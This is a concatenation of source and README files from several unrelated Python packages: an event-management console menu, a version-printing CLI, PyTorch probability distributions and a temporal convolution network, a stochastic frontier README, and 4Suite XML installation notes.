print("\t2. CREATE NETWORKING EVENT")
print("\t3. CREATE PARTY EVENT")
print("\t4. CREATE WORKSHOP EVENT")
print("\t5. BACK TO MAIN MENU")
print("\tSelect Your Option (1-5) ")
ch = input()
if ch == '1':
createCharityEvent()
elif ch == '2':
createNetworkingEvent()
elif ch == '3':
createPartyEvent()
elif ch == '4':
createWorkshopEvent()
elif ch == '5':
mainMenu()
def mainMenu():
ch = ''
num = 0
while ch != 8:
print("\t\t\t\t-----------------------")
print("\t\t\t\tEVENT MANAGEMENT SYSTEM")
print("\t\t\t\t-----------------------")
print("\tMAIN MENU")
print("\t1. BOOK TICKET")
print("\t2. VIEW TICKETS")
print("\t3. CREATE EVENT")
print("\t4. VIEW EVENTS")
print("\t5. SHOW SUMMARY")
print("\tSelect Your Option (1-5) ")
ch = input()
if ch == '1':
bookEventTicket()
elif ch == '2':
getTicketDetails()
elif ch == '3':
createEvents()
elif ch == '4':
getEventsDetails()
elif ch == '5':
getEventsSummary()
###################################################### Start Program
if __name__ == '__main__':
mainMenu() | 437-project | /437-project-1.3.tar.gz/437-project-1.3/src/DriverClass.py | DriverClass.py |
import datetime
import inspect
import operator
import os
import platform
import re
import sys
from functools import reduce
from .__version__ import __version__
def cli(argv=None):
if argv is None:
argv = sys.argv
if argv[0].endswith("pytest"): # pragma: no cover
argv = ["4711"]
process_name = str(argv[0]) if argv and isinstance(argv, list) and len(argv) >= 1 else "4711"
argv = argv[1:] if argv and isinstance(argv, list) and len(argv) > 1 else []
if argv:
argv = list(
filter(lambda x: x.strip(), map(lambda x: x.strip(), reduce(operator.concat, [x.split("=") for x in argv])))
)
command = None
optioned_command = None
available_commands = ("help", "version")
available_pre_command_options = {
"-h": {"command": "help", "option": "--help", "values": 0},
"--help": {"command": "help", "option": "--help", "values": 0},
"-v": {"command": "version", "option": "--version", "values": 0},
"-V": {"command": "version", "option": "--version", "values": 0},
"--version": {"command": "version", "option": "--version", "values": 0},
}
option_values = []
values = []
value_count = 0
for i, arg in enumerate(argv):
if value_count:
values.append(arg)
value_count -= 1
if value_count == 0:
option_values.append(values)
if command:
break
if arg in available_pre_command_options:
info = available_pre_command_options[arg]
if not optioned_command and info.get("command"):
optioned_command = info.get("command")
elif optioned_command and info.get("command") and info.get("command") != optioned_command:
print("Something went wrong - conflicting options and/or commands")
sys.exit(1)
value_count = info.get("values")
values = [info.get("option")]
continue
elif arg not in available_pre_command_options and arg.startswith("-"):
print(f"Something went wrong - invalid option: {arg}")
sys.exit(1)
elif arg in available_commands:
if optioned_command and optioned_command != arg:
print("Something went wrong - conflicting options and/or commands")
sys.exit(1)
command = arg
if not command:
command = optioned_command or "help"
if command == "help":
print("Usage: 4711 [options] <command> [...]")
print("")
print("Options:")
print(" -v, --version print installed 4711 version")
print(" -h, --help show this help message and exit")
sys.exit(0)
if command == "version":
cli_version = f"CLI: 4711 / version {__version__}"
script_dir = os.path.dirname(inspect.stack()[-1][1])
if script_dir and process_name and process_name.startswith(script_dir):
cli_version = f'{cli_version} [exec: "{process_name}"]'
print(cli_version)
system_name = platform.uname().system
if system_name == "Darwin":
system_name = f"macOS {platform.mac_ver()[0]}"
platform_line = f"Platform: {system_name} [{platform.machine()}]"
print(platform_line)
sys_version = re.sub(r"\s+", " ", sys.version)
if sys_version.startswith(f"{platform.python_version()} "):
version_len = len(platform.python_version())
sys_version = sys_version[version_len:].strip()
python_line = f"Python: {platform.python_version()} -- {sys_version}"
if len(python_line) > 77:
python_line = re.sub(r"(\[[^(]+) \([^)]+\)(.*)\]$", "\\1\\2]", python_line)
if len(python_line) > 77:
python_line = re.sub(r"[ .]+$", "", python_line[0:74])
python_line = f"{python_line}..."
if (python_line[::-1] + "[").index("[") < (python_line[::-1] + "]").index("]"):
python_line = f"{python_line}]"
print(python_line)
print("")
print(f"Timestamp (now): {datetime.datetime.utcnow().isoformat()}Z")
sys.exit(0)
if __name__ == "__main__": # pragma: no cover
cli() # pylint: disable=no-value-for-parameter | 4711 | /4711-0.0.2-py3-none-any.whl/_4711/_4711.py | _4711.py |
from numbers import Number
import torch
from torch.distributions import constraints
from torch.distributions.distribution import Distribution
from torch.distributions.utils import broadcast_all
from typing import Dict
import numpy as np
class GeneralizedPareto(Distribution):
def __init__(self, xi, beta, validate_args=None):
"""Generalised Pareto distribution.
Args:
xi (torch.Tensor): Tensor containing the xi (heaviness) shape parameters
beta (torch.Tensor): Tensor containing the xi (heaviness) shape parameters
validate_args (bool):
"""
self.xi, self.beta = broadcast_all(xi, beta)
if isinstance(xi, Number) and isinstance(beta, Number):
batch_shape = torch.Size()
else:
batch_shape = self.xi.size()
super(GeneralizedPareto, self).__init__(
batch_shape, validate_args=validate_args
)
if (
self._validate_args
and not torch.lt(-self.beta, torch.zeros_like(self.beta)).all()
):
raise ValueError("GenPareto is not defined when scale beta<=0")
@property
def arg_constraints(self) -> Dict[str, constraints.Constraint]:
constraint_dict = {
"xi": constraints.positive,
"beta": constraints.positive,
}
return constraint_dict
@property
def mean(self):
mu = torch.where(
self.xi < 1,
torch.div(self.beta, 1 - self.xi),
np.nan * torch.ones_like(self.xi),
)
return mu
@property
def variance(self):
xi, beta = self.xi, self.beta
return torch.where(
xi < 1 / 2.0,
torch.div(beta ** 2, torch.mul((1 - xi) ** 2, (1 - 2 * xi))),
np.nan * torch.ones_like(xi),
)
@property
def stddev(self):
return torch.sqrt(self.variance)
def log_prob(self, x):
if self.xi == 0:
logp = -self.beta.log() - x / self.beta
else:
logp = -self.beta.log() - (1 + 1.0 / (self.xi + 1e-6)) * torch.log(
1 + self.xi * x / self.beta
)
return torch.where(
x < torch.zeros_like(x), -np.inf * torch.ones_like(x), logp
)
def cdf(self, x):
x_shifted = torch.div(x, self.beta)
u = 1 - torch.pow(1 + self.xi * x_shifted, -torch.reciprocal(self.xi))
return u
def icdf(self, value):
x_shifted = torch.div(torch.pow(1 - value, -self.xi) - 1, self.xi)
x = torch.mul(x_shifted, self.beta)
return x | 4996 | /4996-0.1.1-py3-none-any.whl/time_series/components/distributions/generalized_pareto.py | generalized_pareto.py |
import torch
import torch.nn.functional as F
from .univariate_binned import UnivariateBinned
from .generalized_pareto import GeneralizedPareto
class UnivariateSplicedBinnedPareto(UnivariateBinned):
r"""
Spliced Binned-Pareto univariate distribution.
Arguments
----------
bins_lower_bound: The lower bound of the bin edges
bins_upper_bound: The upper bound of the bin edges
nbins: The number of equidistance bins to allocate between `bins_lower_bound` and `bins_upper_bound`. Default value is 100.
percentile_gen_pareto: The percentile of the distribution that is each tail. Default value is 0.05. NB: This symmetric percentile can still represent asymmetric upper and lower tails.
"""
def __init__(
self,
bins_lower_bound: float,
bins_upper_bound: float,
nbins: int = 100,
percentile_gen_pareto: torch.Tensor = torch.tensor(0.05),
validate_args=None,
):
super().__init__(
bins_lower_bound, bins_upper_bound, nbins, validate_args
)
assert (
percentile_gen_pareto > 0 and percentile_gen_pareto < 1
), "percentile_gen_pareto must be between (0,1)"
self.percentile_gen_pareto = percentile_gen_pareto
self.lower_xi = torch.nn.Parameter(torch.tensor(0.5))
self.lower_beta = torch.nn.Parameter(torch.tensor(0.5))
self.lower_gen_pareto = GeneralizedPareto(self.lower_xi, self.lower_beta)
self.upper_xi = torch.nn.Parameter(torch.tensor(0.5))
self.upper_beta = torch.nn.Parameter(torch.tensor(0.5))
self.upper_gen_pareto = GeneralizedPareto(self.upper_xi, self.upper_beta)
self.lower_xi_batch = None
self.lower_beta_batch = None
self.upper_xi_batch = None
self.upper_beta_batch = None
def to_device(self, device):
"""
Moves members to a specified torch.device
"""
self.device = device
self.bin_min = self.bin_min.to(device)
self.bin_max = self.bin_max.to(device)
self.bin_edges = self.bin_edges.to(device)
self.bin_widths = self.bin_widths.to(device)
self.bin_centres = self.bin_centres.to(device)
self.logits = self.logits.to(device)
def forward(self, x):
"""
Takes input x as the new parameters to specify the bin probabilities: logits for the base distribution, and xi and beta for each tail distribution.
"""
if len(x.shape) > 1:
# If mini-batching
self.logits = x[:, : self.nbins]
self.lower_xi_batch = F.softplus(x[:, self.nbins])
self.lower_beta_batch = F.softplus(x[:, self.nbins + 1])
self.upper_xi_batch = F.softplus(x[:, self.nbins + 2])
self.upper_beta_batch = F.softplus(x[:, self.nbins + 3])
else:
# If not mini-batching
self.logits = x[: self.nbins]
self.lower_xi_batch = F.softplus(x[self.nbins])
self.lower_beta_batch = F.softplus(x[self.nbins + 1])
self.upper_xi_batch = F.softplus(x[self.nbins + 2])
self.upper_beta_batch = F.softplus(x[self.nbins + 3])
self.upper_gen_pareto.xi = self.upper_xi_batch
self.upper_gen_pareto.beta = self.upper_beta_batch
self.lower_gen_pareto.xi = self.lower_xi_batch
self.lower_gen_pareto.beta = self.lower_beta_batch
return self.logits
def log_p(self, xx, for_training=True):
"""
Arguments
----------
xx: one datapoint
for_training: boolean to indicate a return of the log-probability, or of the loss (which is an adjusted log-probability)
"""
assert xx.shape.numel() == 1, "log_p() expects univariate"
# Compute upper and lower tail thresholds at current time from their percentiiles
upper_percentile = self.icdf(1 - self.percentile_gen_pareto)
lower_percentile = self.icdf(self.percentile_gen_pareto)
# Log-prob given binned distribution
logp_bins = self.log_binned_p(xx) + torch.log(
1 - 2 * self.percentile_gen_pareto
)
logp = logp_bins
# Log-prob given upper tail distribution
if xx > upper_percentile:
if self.upper_xi_batch is not None:
# self.upper_gen_pareto.xi = torch.square(self.upper_xi_batch[self.idx])
# self.upper_gen_pareto.beta = torch.square(self.upper_beta_batch[self.idx])
self.upper_gen_pareto.xi = self.upper_xi_batch[self.idx]
self.upper_gen_pareto.beta = self.upper_beta_batch[self.idx]
logp_gen_pareto = self.upper_gen_pareto.log_prob(
xx - upper_percentile
) + torch.log(self.percentile_gen_pareto)
logp = logp_gen_pareto
if for_training:
logp += logp_bins
# Log-prob given upper tail distribution
elif xx < lower_percentile:
if self.lower_xi_batch is not None:
# self.lower_gen_pareto.xi = torch.square(self.lower_xi_batch[self.idx])
# self.lower_gen_pareto.beta = torch.square(self.lower_beta_batch[self.idx])
self.lower_gen_pareto.xi = self.lower_xi_batch[self.idx]
self.lower_gen_pareto.beta = self.lower_beta_batch[self.idx]
logp_gen_pareto = self.lower_gen_pareto.log_prob(
lower_percentile - xx
) + torch.log(self.percentile_gen_pareto)
logp = logp_gen_pareto
if for_training:
logp += logp_bins
return logp
def cdf_components(self, xx, idx=0, cum_density=torch.tensor([0.0])):
"""
Cumulative density for one datapoint `xx`, where `cum_density` is the cdf up to bin_edges `idx` which must be lower than `xx`
"""
bin_cdf_relative = torch.tensor([0.0])
upper_percentile = self.icdf(1 - self.percentile_gen_pareto)
lower_percentile = self.icdf(self.percentile_gen_pareto)
if xx < lower_percentile:
adjusted_xx = lower_percentile - xx
cum_density = (
1.0 - self.lower_gen_pareto.cdf(adjusted_xx)
) * self.percentile_gen_pareto
elif xx <= upper_percentile:
idx, cum_density, bin_cdf_relative = self.cdf_binned_components(
xx, idx, cum_density
)
else:
adjusted_xx = xx - upper_percentile
cum_density = (
1.0 - self.percentile_gen_pareto
) + self.upper_gen_pareto.cdf(
adjusted_xx
) * self.percentile_gen_pareto
return idx, cum_density, bin_cdf_relative
def inverse_cdf(self, value):
"""
Inverse cdf of a single percentile `value`
"""
assert (
value >= 0.0 and value <= 1.0
), "percentile value must be between 0 and 1 inclusive"
if value < self.percentile_gen_pareto:
adjusted_percentile = 1 - (value / self.percentile_gen_pareto)
icdf_value = self.inverse_binned_cdf(
self.percentile_gen_pareto
) - self.lower_gen_pareto.icdf(adjusted_percentile)
elif value <= 1 - self.percentile_gen_pareto:
icdf_value = self.inverse_binned_cdf(value)
else:
adjusted_percentile = (
value - (1.0 - self.percentile_gen_pareto)
) / self.percentile_gen_pareto
icdf_value = self.upper_gen_pareto.icdf(
adjusted_percentile
) + self.inverse_binned_cdf(1 - self.percentile_gen_pareto)
return icdf_value | 4996 | /4996-0.1.1-py3-none-any.whl/time_series/components/distributions/univariate_splice_binned_pareto.py | univariate_splice_binned_pareto.py |
import torch
import torch.nn.functional as F
from typing import List, Union, Optional
import numpy as np
class UnivariateBinned(torch.nn.Module):
r"""
Binned univariate distribution designed as an nn.Module
Arguments
----------
bins_lower_bound: The lower bound of the bin edges
bins_upper_bound: The upper bound of the bin edges
nbins: The number of equidistant bins to allocate between `bins_lower_bound` and `bins_upper_bound`. Default value is 100.
smoothing_indicator: The method of smoothing to perform on the bin probabilities
"""
def __init__(
self,
bins_lower_bound: float,
bins_upper_bound: float,
nbins: int = 100,
smoothing_indicator: Optional[str] = [None, "cheap", "kernel"][1],
validate_args=None,
):
super().__init__()
assert (
bins_lower_bound.shape.numel() == 1
), f"bins_lower_bound needs to have shape torch.Size([1])"
assert (
bins_upper_bound.shape.numel() == 1
), f"bins_upper_bound needs to have shape torch.Size([1])"
assert (
bins_lower_bound < bins_upper_bound
), f"bins_lower_bound {bins_lower_bound} needs to less than bins_upper_bound {bins_upper_bound}"
self.nbins = nbins
self.epsilon = np.finfo(np.float32).eps
self.smooth_indicator = smoothing_indicator
# Creation the bin locations
# Bins locations are placed uniformly between bins_lower_bound and bins_upper_bound, though more complex methods could be used
self.bin_min = bins_lower_bound - self.epsilon * 6
self.bin_max = bins_upper_bound + self.epsilon * 6
self.bin_edges = torch.linspace(self.bin_min, self.bin_max, nbins + 1)
self.bin_widths = self.bin_edges[1:] - self.bin_edges[:-1]
self.bin_centres = (self.bin_edges[1:] + self.bin_edges[:-1]) * 0.5
logits = torch.ones(nbins)
logits = (
logits / logits.sum() / (1 + self.epsilon) / self.bin_widths.mean()
)
self.logits = torch.log(logits)
# Keeps track of mini-batches
self.idx = None
self.device = None
def to_device(self, device):
"""
Moves members to a specified torch.device
"""
self.device = device
self.bin_min = self.bin_min.to(device)
self.bin_max = self.bin_max.to(device)
self.bin_edges = self.bin_edges.to(device)
self.bin_widths = self.bin_widths.to(device)
self.bin_centres = self.bin_centres.to(device)
def forward(self, x):
"""
Takes input x as new logits
"""
self.logits = x
return self.logits
def log_bins_prob(self):
if self.idx is None:
log_bins_prob = F.log_softmax(self.logits, dim=0).sub(
torch.log(self.bin_widths)
)
else:
log_bins_prob = F.log_softmax(self.logits[self.idx, :], dim=0).sub(
torch.log(self.bin_widths)
)
return log_bins_prob.float()
def bins_prob(self):
bins_prob = self.log_bins_prob().exp()
return bins_prob
def bins_cdf(self):
incomplete_cdf = self.bins_prob().mul(self.bin_widths).cumsum(dim=0)
zero = 0 * incomplete_cdf[0].view(1) # ensured to be on same device
return torch.cat((zero, incomplete_cdf))
def log_binned_p(self, xx):
"""
Log probability for one datapoint.
"""
assert xx.shape.numel() == 1, "log_binned_p() expects univariate"
# Transform xx in to a one-hot encoded vector to get bin location
vect_above = xx - self.bin_edges[1:]
vect_below = self.bin_edges[:-1] - xx
one_hot_bin_indicator = (vect_above * vect_below >= 0).float()
if xx > self.bin_edges[-1]:
one_hot_bin_indicator[-1] = 1.0
elif xx < self.bin_edges[0]:
one_hot_bin_indicator[0] = 1.0
if not (one_hot_bin_indicator == 1).sum() == 1:
print(
f"Warning in log_p(self, xx): for xx={xx.item()}, one_hot_bin_indicator value_counts are {one_hot_bin_indicator.unique(return_counts=True)}"
)
if self.smooth_indicator == "kernel":
# The kernel variant is better but slows down training quite a bit
idx_one_hot = torch.argmax(one_hot_bin_indicator)
kernel = [0.006, 0.061, 0.242, 0.383, 0.242, 0.061, 0.006]
len_kernel = len(kernel)
for i in range(len_kernel):
idx = i - len_kernel // 2 + idx_one_hot
if idx in range(len(one_hot_bin_indicator)):
one_hot_bin_indicator[idx] = kernel[i]
elif self.smooth_indicator == "cheap":
# This variant is cheaper in computation time
idx_one_hot = torch.argmax(one_hot_bin_indicator)
if not idx_one_hot + 1 >= len(one_hot_bin_indicator):
one_hot_bin_indicator[idx_one_hot + 1] = 0.5
if not idx_one_hot - 1 < 0:
one_hot_bin_indicator[idx_one_hot - 1] = 0.5
if not idx_one_hot + 2 >= len(one_hot_bin_indicator):
one_hot_bin_indicator[idx_one_hot + 2] = 0.25
if not idx_one_hot - 2 < 0:
one_hot_bin_indicator[idx_one_hot - 2] = 0.25
logp = torch.dot(one_hot_bin_indicator, self.log_bins_prob())
return logp
def log_p(self, xx):
"""
Log probability for one datapoint `xx`.
"""
assert xx.shape.numel() == 1, "log_p() expects univariate"
return self.log_binned_p(xx)
def log_prob(self, x):
"""
Log probability for a tensor of datapoints `x`.
"""
x = x.view(x.shape.numel())
self.idx = 0
if x.shape[0] == 1:
self.idx = None
lpx = self.log_p(x[0]).view(1)
if x.shape.numel() == 1:
return lpx
for xx in x[1:]:
self.idx += 1
lpxx = self.log_p(xx).view(1)
lpx = torch.cat((lpx, lpxx), 0)
self.idx = None
return lpx
def cdf_binned_components(
self, xx, idx=0, cum_density=torch.tensor([0.0])
):
"""
Cumulative density given bins for one datapoint `xx`, where `cum_density` is the cdf up to bin_edges `idx` which must be lower than `xx`
"""
assert xx.shape.numel() == 1, "cdf_components() expects univariate"
bins_range = self.bin_edges[-1] - self.bin_edges[0]
bin_cdf_relative = torch.tensor([0.0])
if idx == 0:
cum_density = torch.tensor([0.0])
while xx > self.bin_edges[idx] and idx < self.nbins:
bin_width = self.bin_edges[idx + 1] - self.bin_edges[idx]
if xx < self.bin_edges[idx + 1]:
bin_cdf = torch.distributions.uniform.Uniform(
self.bin_edges[idx], self.bin_edges[idx + 1]
).cdf(xx)
bin_cdf_relative = bin_cdf * bin_width / bins_range
break
else:
cum_density += self.bins_prob()[idx] * bin_width
idx += 1
return idx, cum_density, bin_cdf_relative
def cdf_components(self, xx, idx=0, cum_density=torch.tensor([0.0])):
"""
Cumulative density for one datapoint `xx`, where `cum_density` is the cdf up to bin_edges `idx` which must be lower than `xx`
"""
return self.cdf_binned_components(xx, idx, cum_density)
def cdf(self, x):
"""
Cumulative density tensor for a tensor of datapoints `x`.
"""
x = x.view(x.shape.numel())
sorted_x = x.sort()
x, unsorted_index = sorted_x.values, sorted_x.indices
idx, cum_density, bin_cdf_relative = self.cdf_components(
x[0], idx=0, cum_density=torch.tensor([0.0])
)
cdf_tensor = (cum_density + bin_cdf_relative).view(1)
if x.shape.numel() == 1:
return cdf_tensor
for xx in x[1:]:
idx, cum_density, bin_cdf_relative = self.cdf_components(
xx, idx, cum_density
)
cdfx = (cum_density + bin_cdf_relative).view(1)
cdf_tensor = torch.cat((cdf_tensor, cdfx), 0)
cdf_tensor = cdf_tensor[unsorted_index]
return cdf_tensor
def inverse_binned_cdf(self, value):
"""
Inverse binned cdf of a single quantile `value`
"""
assert (
value.shape.numel() == 1
), "inverse_binned_cdf() expects univariate"
if value == 0.0:
return self.bin_edges[0]
if value == 1:
return self.bin_edges[-1]
vect_above = value - self.bins_cdf()[1:]
vect_below = self.bins_cdf()[:-1] - value
if (vect_above == 0).any():
result = self.bin_edges[1:][vect_above == 0]
elif (vect_below == 0).any():
result = self.bin_edges[:-1][vect_below == 0]
else:
one_hot_edge_indicator = vect_above * vect_below >= 0 # .float()
low = self.bin_edges[:-1][one_hot_edge_indicator]
high = self.bin_edges[1:][one_hot_edge_indicator]
value_relative = (
value - self.bins_cdf()[:-1][one_hot_edge_indicator]
)
result = torch.distributions.uniform.Uniform(low, high).icdf(
value_relative
)
return result
def inverse_cdf(self, value):
"""
Inverse cdf of a single percentile `value`
"""
return self.inverse_binned_cdf(value)
def icdf(self, values):
"""
Inverse cdf of a tensor of quantile `values`
"""
if self.device is not None:
values = values.to(self.device)
values = values.view(values.shape.numel())
icdf_tensor = self.inverse_cdf(values[0])
icdf_tensor = icdf_tensor.view(1)
if values.shape.numel() == 1:
return icdf_tensor
for value in values[1:]:
icdf_value = self.inverse_cdf(value).view(1)
icdf_tensor = torch.cat((icdf_tensor, icdf_value), 0)
return icdf_tensor | 4996 | /4996-0.1.1-py3-none-any.whl/time_series/components/distributions/univariate_binned.py | univariate_binned.py |
import torch.nn as nn
from torch.nn.utils import weight_norm
class Chomp1d(nn.Module):
def __init__(self, chomp_size):
"""Chomp1d
Source: https://github.com/locuslab/TCN/blob/8845f88f31def1e7ffccb8811ea966e9f58d9695/TCN/tcn.py
Args:
chomp_size:
"""
super(Chomp1d, self).__init__()
self.chomp_size = chomp_size
def forward(self, x):
return x[:, :, :-self.chomp_size].contiguous()
class TemporalBlock(nn.Module):
def __init__(self, n_inputs, n_outputs, kernel_size, stride, dilation, padding, dropout=0.2):
"""Temporal Block
Source: https://github.com/locuslab/TCN/blob/8845f88f31def1e7ffccb8811ea966e9f58d9695/TCN/tcn.py
Args:
n_inputs:
n_outputs:
kernel_size:
stride:
dilation:
padding:
dropout:
"""
super(TemporalBlock, self).__init__()
self.conv1 = weight_norm(nn.Conv1d(n_inputs, n_outputs, kernel_size,
stride=stride, padding=padding, dilation=dilation))
self.chomp1 = Chomp1d(padding)
self.relu1 = nn.ReLU()
self.dropout1 = nn.Dropout(dropout)
self.conv2 = weight_norm(nn.Conv1d(n_outputs, n_outputs, kernel_size,
stride=stride, padding=padding, dilation=dilation))
self.chomp2 = Chomp1d(padding)
self.relu2 = nn.ReLU()
self.dropout2 = nn.Dropout(dropout)
self.net = nn.Sequential(self.conv1, self.chomp1, self.relu1, self.dropout1,
self.conv2, self.chomp2, self.relu2, self.dropout2)
self.downsample = nn.Conv1d(n_inputs, n_outputs, 1) if n_inputs != n_outputs else None
self.relu = nn.ReLU()
self.init_weights()
def init_weights(self):
self.conv1.weight.data.normal_(0, 0.01)
self.conv2.weight.data.normal_(0, 0.01)
if self.downsample is not None:
self.downsample.weight.data.normal_(0, 0.01)
def forward(self, x):
out = self.net(x)
res = x if self.downsample is None else self.downsample(x)
return self.relu(out + res)
class TemporalConvNet(nn.Module):
def __init__(self, num_inputs, num_channels, kernel_size=2, dropout=0.2):
"""Temporal Convolution Network (TCN)
Source: https://github.com/locuslab/TCN/blob/8845f88f31def1e7ffccb8811ea966e9f58d9695/TCN/tcn.py
Args:
num_inputs:
num_channels:
kernel_size:
dropout:
"""
super(TemporalConvNet, self).__init__()
layers = []
num_levels = len(num_channels)
for i in range(num_levels):
dilation_size = 2 ** i
in_channels = num_inputs if i == 0 else num_channels[i - 1]
out_channels = num_channels[i]
layers += [TemporalBlock(in_channels, out_channels, kernel_size, stride=1, dilation=dilation_size,
padding=(kernel_size - 1) * dilation_size, dropout=dropout)]
self.network = nn.Sequential(*layers)
def forward(self, x):
return self.network(x)
class TCNAdapterForRNN(TemporalConvNet):
def __init__(self, input_size, hidden_size, num_layers=2, kernel_size=2, dropout=0.2, rnn_compatibility=True):
"""RNN adapter for TCN
Allows for drop-in replacement of RNN encoders
Args:
input_size (int): input size
hidden_size (int): hidden size specifying the number of channels per convolutional layer
num_layers (int): the number of dilated convolutional layers
kernel_size (int): size of the kernel of each layer
dropout (float): dropout rate
rnn_compatibility (bool): should we reshape the inputs and output to retain compatibility with RNN layers?
"""
num_channels = [hidden_size for _ in range(num_layers)]
super(TCNAdapterForRNN, self).__init__(input_size, num_channels, kernel_size, dropout)
self.rnn_compatibility = rnn_compatibility
def forward(self, x):
x = x.permute(0, 2, 1) if self.rnn_compatibility else x
output = self.network(x)
output = output.permute(0, 2, 1) if self.rnn_compatibility else output
return output | 4996 | /4996-0.1.1-py3-none-any.whl/time_series/components/encoder/tcn.py | tcn.py |
# SF4wD #
four-component stochastic frontier model with determinants
## Motivation ##
This package was developed to complement four-component stochastic frontier that consider
determinants in mean and variance parameters of inefficiency distributions
by Ruei-Chi Lee.
## Installation ##
Install via `$ pip install 4SFwD`
## Features ##
* **SF4wD**: main.py - set method and model to run simulation or real data
* **HMC**: Hamilton Monte Carlo designed for determinants parameters.
* **DA**: Data augmentation for the model
* **TK**: Two-parametrization method originally proposed by Tsiona and Kunmbhaker (2014) for four-component model without determinants.
* **PMCMC**: Particle MCMC for the model (perferred approach) - speed up by GPU parallel computation
## Example ##
Here is how you run a simulation estimation for a four-component stochastic frontier model via PMCMC:
- Parameter setting guideline in the SF4wD.py
- Simulation data only offers stochastic frontier model that consider determinants in both mean and variance parameter of inefficiencies.
```python
import SF4wD
#model:str - different way to consider determinants
#method:str - different Bayesian method to estimate the model
#data_name : str - simulation data or data in data/.
#S : int - MCMC length
#H : int - number of particles in PMCMC
#gpu: boolean - use parallel computation to run PMCMC
#save: boolean - save MCMC data
my_model = SF4wD(model = 'D', method = 'PMCMC', data_name ='',S=10, H=100, gpu=False, save=False)
my_model.run()
```
output:
```python
mean sd hpd_3% hpd_97% mcse_mean mcse_sd ess_mean ess_sd ess_bulk ess_tail r_hat
beta0 2.412 0.093 2.318 2.555 0.046 0.035 4.0 4.0 7.0 10.0 NaN
beta1 1.078 0.074 0.977 1.242 0.023 0.017 10.0 10.0 10.0 10.0 NaN
xi0 0.580 0.043 0.531 0.652 0.014 0.011 9.0 9.0 8.0 10.0 NaN
xi1 0.694 0.127 0.479 0.867 0.073 0.058 3.0 3.0 3.0 10.0 NaN
delta0 0.141 0.072 0.013 0.273 0.023 0.019 10.0 8.0 10.0 10.0 NaN
delta1 0.774 0.137 0.620 0.984 0.079 0.063 3.0 3.0 3.0 10.0 NaN
z0 -0.461 0.716 -1.844 0.609 0.376 0.291 4.0 4.0 4.0 10.0 NaN
z1 2.728 0.889 1.268 3.941 0.459 0.354 4.0 4.0 4.0 10.0 NaN
gamma0 0.662 0.092 0.500 0.773 0.052 0.041 3.0 3.0 3.0 10.0 NaN
gamma1 0.412 0.061 0.349 0.519 0.021 0.015 9.0 9.0 9.0 10.0 NaN
sigma_alpha_sqr 1.377 0.178 1.095 1.693 0.075 0.057 6.0 6.0 6.0 10.0 NaN
sigma_v_sqr 2.575 2.523 1.290 9.515 1.062 0.793 6.0 6.0 3.0 10.0 NaN
```
## License ##
Ruei-Chi Lee is the main author and contributor.
Bug reports, feature requests, questions, rants, etc are welcome, preferably
on the github page.
| 4SFwD | /4SFwD-0.0.2.tar.gz/4SFwD-0.0.2/README.md | README.md |
4SUITE CONTENTS
===============
4Suite is a suite of Python modules for XML and RDF processing.
Its major components include the following:
* Ft.Xml.Domlette: A very fast, lightweight XPath-oriented DOM.
* Ft.Xml.Sax: A very fast SAX 2 parser.
* Ft.Xml.XPath: An XPath 1.0 implementation for Domlette documents.
* Ft.Xml.Xslt: A robust XSLT 1.0 processor.
* Ft.Xml.XUpdate: An XUpdate processor.
* Ft.Lib: Various support libraries that can be used independently.
* Ft.Rdf: RDF processing tools, including a query/inference language.
* Ft.Server: An integrated document & RDF repository with web access.
4Suite also includes convenient command-line tools:
* 4xml: XML document parsing and reserialization.
* 4xpath: XPath expression evaluation.
* 4xslt: XSLT processing engine.
* 4xupdate: XUpdate processing.
* 4rdf: RDF/XML parsing, persistence, querying and reserialization.
* 4ss_manager: Document/RDF repository administration.
* 4ss: Document/RDF repository user commands.
Effective version 1.0b2, Ft.Lib and Ft.Xml are distributed as the
"4Suite XML" release package. The Ft.Rdf and Ft.Server components will
be packaged as separate add-ons after the 4Suite XML 1.0 release.
If you need RDF or repository functionality before then, you must use
the monolithic 4Suite 1.0b1 release for now.
MINIMUM PREREQUISITES
=====================
* General requirements:
(1) The underlying platform must be either POSIX or Windows.
POSIX means any Unix-like OS, such as a major Linux distro,
FreeBSD, OpenBSD, NetBSD, Solaris, Cygwin, Mac OS X, etc.
Windows means Windows 2000, XP, or Server 2003. Windows 98, Me,
or NT might work, but no guarantees.
(2) Python 2.2.1 or higher.
(3) If building from source, a C compiler is required.
* Additional requirements for certain features:
* Triclops (RDF graph visualizer in repository Dashboard) - GraphViz
(any version with the executable 'dot' or 'dot.exe').
RECOMMENDATIONS
===============
* Use Python 2.3.5 or 2.4.4.
* Use an official python.org Python distribution, not ActiveState's.
* If PyXML is installed, make sure it is the latest version.
* If installing PyXML after 4Suite, install PyXML with --without-xpath.
OS-SPECIFIC INSTALLATION NOTES
==============================
* On POSIX, if building from source, the install step will result in a
build, if it hasn't been done already. The user doing the install
must have permission to write to all of the installation directories,
so it is typical to do the install, if not also the build, as root.
If you want to do the build step as a regular user, do it first with
'python setup.py build' as the regular user, then su to root, and run
'python setup.py install'.
* Some Linux distros come with old versions of 4Suite. Try to remove
all traces of the old versions before installing the new.
* Some POSIX platforms come with prebuilt versions of Python. Ensure
that the version you are using meets 4Suite's minimum prerequisites.
Some Python installations are missing libs and C headers, were built
with unusual options, or have other quirks that interfere with
building and using 4Suite. Affected users may need to replace their
Python installation, perhaps by building Python from source.
* On Windows, if installing with the self-extracting .exe, keys from a
standard Python distribution from python.org must be present in the
Registry.
* On Mac OS X, it is recommended by the pythonmac-sig to use the
universal installer for both PPC and Intel Macs instead of the system
supplied (Apple's) Python.
GENERAL INSTALLATION
====================
On Windows, if installing from self-extracting .exe:
1. Just run the installer.
On Red Hat Linux, if installing from .rpm archive:
1. Use 'rpm' in the normal way.
On POSIX or Windows, if building from source:
1. Unpack the source distribution.
2. cd 4Suite
3. As root, run 'python setup.py install'
For custom build and installation options, see
'python setup.py --help'
'python setup.py config --help'
'python setup.py build --help'
'python setup.py install --help'
See more detailed instructions at
http://4suite.org/docs/UNIX.xml (POSIX)
http://4Suite.org/docs/Windows.xml (Windows)
POST-INSTALL TESTING
====================
Extensive regression tests are bundled with 4Suite. After installation,
you can go to the Tests directory (its installed location varies by
platform) and follow the instructions in the README there.
DOCUMENTATION
=============
Documentation is piecemeal and always a work-in-progress; sorry.
As mentioned, detailed instructions for installation are on 4suite.org.
Detailed instructions for setting up and using some of the repository
features of 4Suite are at http://4suite.org/docs/QuickStart.xml
An installation layout guide that describes common install locations
and how the current installation system works is available at
http://4suite.org/docs/installation-locations.xhtml
Python API docs (in XML and HTML) can be generated when building from
source by adding the option '--with-docs' to the setup.py invocation.
These will end up in a documentation directory during the install;
